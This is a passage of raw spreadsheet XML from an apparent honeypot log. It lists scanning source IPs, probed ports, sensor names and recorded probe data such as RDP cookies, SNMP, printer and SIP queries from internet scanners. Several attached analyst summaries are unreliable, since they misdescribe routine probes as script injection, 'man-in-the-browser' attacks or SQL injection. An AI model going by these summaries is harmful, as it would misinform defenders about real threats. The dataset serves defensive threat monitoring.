    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;NA&amp;&amp;110&amp;&amp;53671&amp;&amp;143&amp;&amp;80&amp;&amp;3389&amp;&amp;54128&amp;&amp;1521&amp;&amp;161&amp;&amp;5432&amp;&amp;57774&amp;&amp;20184&amp;&amp;23&amp;&amp;6379&amp;&amp;56229&amp;&amp;445&amp;&amp;56781&amp;&amp;51974&amp;&amp;9100&amp;&amp;3306&amp;&amp;1433&amp;&amp;51762&amp;&amp;389&amp;&amp;21&amp;&amp;443&amp;&amp;55303&amp;&amp;49654&amp;&amp;49301&amp;&amp;1080&amp;&amp;51926&amp;&amp;55152&amp;&amp;5900&amp;&amp;53425&amp;&amp;51592</t>
  </si>
  <si>
    <t>connection&amp;&amp;NA&amp;&amp;stshash&amp;&amp;command&amp;&amp;GET&amp;&amp;request&amp;&amp;query</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=NccSyfCMo'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ctNZDW'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=zyXLyR'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=wiYIXWUJG'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=OCydRL'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=bexmDx'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=qCClpfWiL'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=HoXWXy'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=kCObtl'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=NIZHYMECl'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=UUVNPp'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=YmJMoY'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=DXwWFgnor'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=cWlmGN'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=nZlVth'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=fmAYRtYiH'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=lSGRmy'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=CrXjaz'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.76,65044)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.76,65054)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.76,65062)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.76,62088)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.76,62104)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.76,62120)}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=NtrHNgExa'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=fQGrfa'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=oxTEnG'}}</t>
  </si>
  <si>
    <t>::ffff:cdd2:1f4c</t>
  </si>
  <si>
    <t>An attacker is attempting to inject malicious code into an RDP session, likely using a technique called "man-in-the-browser" attack. This involves exploiting the browser's trust in the user to carry out malicious actions. The attacker is attempting to bypass security controls through this method. &amp;&amp; Malicious actor attempting to inject malicious script into Remote Desktop Protocol session, possibly exploiting vulnerability for unauthorized access. The injected script is using a specific hash value to potentially bypass security measures. This activity suggests an attempt to escalate privileges or gain unauthorized control over the system. &amp;&amp; The system attempted to access an Oracle database, but was unable to authenticate due to missing credentials. This suggests a potential brute-force login attempt or exploitation of the database service. Further analysis is needed to determine the intent behind this activity. &amp;&amp; The data indicates an attempt to retrieve SNMP information from a system without authorization, potentially for reconnaissance or malicious purposes. The lack of SNMP data may indicate that the attempt was unsuccessful or that the requested data is not available. This could be an initial step in a larger attack. &amp;&amp; Unauthorized access to a network service is detected, using default community string "public" which is often used for initial setup but should be changed for security reasons. This could be an attempt to gain unauthorized access or extract sensitive information. The version indicates the SNMP protocol being used. &amp;&amp; The data indicates possible probing or reconnaissance activity targeting an Oracle database service, as it's unable to gather information from it, suggesting an attempt to map the system's capabilities. &amp;&amp; Malicious activity detected, attempted FTP connection is missing necessary information to proceed. This suggests an incomplete or fake attempt to exploit the system via FTP. No legitimate credentials provided. &amp;&amp; Attempt to initiate encrypted connection, likely part of brute-force login attempt. Malicious actor attempting to establish secure communication for unauthorized access. Possible precursor to password guessing or other malicious actions. &amp;&amp; A user is attempting to enable secure (TLS) authentication for an FTP service, which may be an attempt to bypass weak or non-existent security measures on the server. The presence of TLS authentication suggests that the attacker is aware of potential vulnerabilities in non-TLS enabled services. This activity could indicate a reconnaissance step before exploiting vulnerabilities. &amp;&amp; There is an attempt to access IMAP service without providing any credentials or data. This could be a scanning activity for potential vulnerabilities or a reconnaissance step before more malicious actions. The attacker is likely trying to identify possible entry points into the system.</t>
  </si>
  <si>
    <t>Brute Login &amp;&amp; RDP Exploit &amp;&amp; SQL Injection &amp;&amp; Scan Failure</t>
  </si>
  <si>
    <t>de886d499a942d284a069762a5106e87</t>
  </si>
  <si>
    <t>154.212.141.212</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_POP3_H23&amp;&amp;SMA-LAB_SSH_H47&amp;&amp;SMA-LAB_SIP_H17&amp;&amp;SMA-LAB_FTP_H44&amp;&amp;SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_SIP_H27&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_MYSQL_H18&amp;&amp;SMA-LAB_PJL_H14&amp;&amp;SMA-LAB_MSSQL_H22&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_POP3_H33&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_PJL_H18&amp;&amp;SMA-LAB_POSTGRES_H15&amp;&amp;SMA-LAB_SMTP_H13&amp;&amp;SMA-LAB_MSSQL_H38&amp;&amp;SMA-LAB_MSSQL_H9&amp;&amp;SMA-LAB_IMAP_H12&amp;&amp;SMA-LAB_POSTGRES_H33&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_SMB_H37&amp;&amp;SMA-LAB_IMAP_H40&amp;&amp;SMA-LAB_SIP_H40&amp;&amp;SMA-LAB_HTTP_H10</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;110&amp;&amp;22&amp;&amp;NA&amp;&amp;21&amp;&amp;23&amp;&amp;3306&amp;&amp;9100&amp;&amp;5432&amp;&amp;25&amp;&amp;80&amp;&amp;445&amp;&amp;443&amp;&amp;22002&amp;&amp;143</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['spam'&amp;&amp; 'unknown'&amp;&amp; 'exploits']}</t>
  </si>
  <si>
    <t>login&amp;&amp;connection&amp;&amp;request&amp;&amp;GET&amp;&amp;NA&amp;&amp;query&amp;&amp;command</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.212;rport=64427'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '77.91.74.218:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 185.255.123.181:9100_x000D_
Accept: */*_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS
'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'User-Agent': 'NTRIP GNSSInternetRadio', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '5.181.21.224:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=', 'Host': '5.181.21.224:443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '66.94.127.183:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'HELP', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '109.123.229.33:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '194.146.12.172:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '38.60.224.106:80', 'method': 'GET', 'uri': '/v1'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '38.60.224.106:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (rPajIOwE,)}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.212;rport=58028'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.212;rport=46975'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.212,41624)}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '94.131.113.33:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '94.131.113.33:80', 'method': 'GET', 'uri': '/v1'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.212,7346)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (EQSzZCSv,)}</t>
  </si>
  <si>
    <t>::ffff:9ad4:8dd4</t>
  </si>
  <si>
    <t>Insufficient log data provided. &amp;&amp; Possible malicious activity is a GET request made to the root directory of the server, potentially scouting for vulnerabilities. The user agent appears to be a legitimate device type, but may be spoofed. This could be a reconnaissance attempt by an attacker.</t>
  </si>
  <si>
    <t>da6593aca58b57f872568f566f40443a</t>
  </si>
  <si>
    <t>125.99.1.202</t>
  </si>
  <si>
    <t>Sāhibābād Daulotpur</t>
  </si>
  <si>
    <t>10263162</t>
  </si>
  <si>
    <t>28.747</t>
  </si>
  <si>
    <t>77.1146</t>
  </si>
  <si>
    <t>::ffff:7d63:1ca</t>
  </si>
  <si>
    <t>4432b93d9f6757472d05e5588bb8388e</t>
  </si>
  <si>
    <t>59.184.49.228</t>
  </si>
  <si>
    <t>::ffff:3bb8:31e4</t>
  </si>
  <si>
    <t>510644acc933fb84103099add31854f1</t>
  </si>
  <si>
    <t>167.94.138.182</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;SIP Endpoint Enumeration</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_POSTGRES_H40&amp;&amp;SMA-LAB_LDAP_H23&amp;&amp;SMA-LAB_IMAP_H28&amp;&amp;SMA-LAB_REDIS_H16&amp;&amp;SMA-LAB_POP3_H36&amp;&amp;SMA-LAB_ORACLE_H15&amp;&amp;SMA-LAB_SMTP_H28&amp;&amp;SMA-LAB_MYSQL_H15&amp;&amp;SMA-LAB_POP3_H15&amp;&amp;SMA-LAB_IPP_H41&amp;&amp;SMA-LAB_LDAP_H21&amp;&amp;SMA-LAB_POP3_H39&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_MYSQL_H32&amp;&amp;SMA-LAB_IPP_H47&amp;&amp;SMA-LAB_SMTP_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_IPP_H3&amp;&amp;SMA-LAB_IMAP_H8&amp;&amp;SMA-LAB_RDP_H3&amp;&amp;SMA-LAB_ORACLE_H29&amp;&amp;SMA-LAB_NTP_H29&amp;&amp;SMA-LAB_MYSQL_H38&amp;&amp;SMA-LAB_ORACLE_H37&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_ORACLE_H34&amp;&amp;SMA-LAB_IPP_H18&amp;&amp;SMA-LAB_POP3_H40&amp;&amp;SMA-LAB_POSTGRES_H47&amp;&amp;SMA-LAB_SOCKS5_H19&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_POP3_H34&amp;&amp;SMA-LAB_HTTPS_H3&amp;&amp;SMA-LAB_POSTGRES_H17&amp;&amp;SMA-LAB_HTTPS_H14&amp;&amp;SMA-LAB_ORACLE_H27&amp;&amp;SMA-LAB_ORACLE_H11&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_SMTP_H36&amp;&amp;SMA-LAB_FTP_H33&amp;&amp;SMA-LAB_MYSQL_H23&amp;&amp;SMA-LAB_IRC_H29&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_SMTP_H8&amp;&amp;SMA-LAB_IPP_H5&amp;&amp;SMA-LAB_HTTPS_H16&amp;&amp;SMA-LAB_SOCKS5_H27&amp;&amp;SMA-LAB_RDP_H19&amp;&amp;SMA-LAB_LDAP_H37&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_IPP_H8&amp;&amp;SMA-LAB_IRC_H33&amp;&amp;SMA-LAB_HTTPS_H32&amp;&amp;SMA-LAB_IRC_H18&amp;&amp;SMA-LAB_HTTPS_H31&amp;&amp;SMA-LAB_SIP_H47&amp;&amp;SMA-LAB_IPP_H36&amp;&amp;SMA-LAB_SIP_H45&amp;&amp;SMA-LAB_SIP_H23&amp;&amp;SMA-LAB_HTTPS_H27&amp;&amp;SMA-LAB_MYSQL_H16&amp;&amp;SMA-LAB_IRC_H11&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_POP3_H9&amp;&amp;SMA-LAB_IMAP_H14&amp;&amp;SMA-LAB_IMAP_H40&amp;&amp;SMA-LAB_SOCKS5_H22&amp;&amp;SMA-LAB_IRC_H5&amp;&amp;SMA-LAB_ORACLE_H38&amp;&amp;SMA-LAB_SMTP_H29&amp;&amp;SMA-LAB_MSSQL_H39&amp;&amp;SMA-LAB_IPP_H22&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_VNC_H35</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;28980&amp;&amp;5432&amp;&amp;389&amp;&amp;143&amp;&amp;6379&amp;&amp;110&amp;&amp;1521&amp;&amp;25&amp;&amp;3306&amp;&amp;631&amp;&amp;23&amp;&amp;3389&amp;&amp;NA&amp;&amp;123&amp;&amp;1433&amp;&amp;1080&amp;&amp;5900&amp;&amp;443&amp;&amp;6667&amp;&amp;445&amp;&amp;80&amp;&amp;8443&amp;&amp;21&amp;&amp;9100&amp;&amp;35106&amp;&amp;60788&amp;&amp;44378&amp;&amp;44380&amp;&amp;44396</t>
  </si>
  <si>
    <t>connection&amp;&amp;GET&amp;&amp;request&amp;&amp;stshash&amp;&amp;login&amp;&amp;query&amp;&amp;command&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.182,60046)}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '209.145.61.177', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_HTTPS:{'Host': '5.180.55.39:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.180.55.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.180.55.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.182;rport=44485'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash='}}&amp;&amp;{Data_ORACLE:{'local_user': 'None', 'program': 'zgrab2', 'service_name': 'None'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '193.57.136.113', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '193.57.136.113', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '185.234.67.80:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://185.234.67.80:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_HTTP:{'Host': '38.60.171.39:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:{'Host': '154.26.156.60:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.182;rport=52922'}}&amp;&amp;{Data_HTTPS:{'Host': '193.57.138.110:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '193.57.138.110', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '193.57.138.110', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '95.164.21.98:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://95.164.21.98:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.182,34762)}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '144', 'Content-Type': 'application/ipp', 'Host': '38.60.209.6:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.60.209.6:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.182;rport=42914'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '156.244.37.11:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://156.244.37.11:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.182;rport=54682'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:{'Host': '154.93.37.45:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys 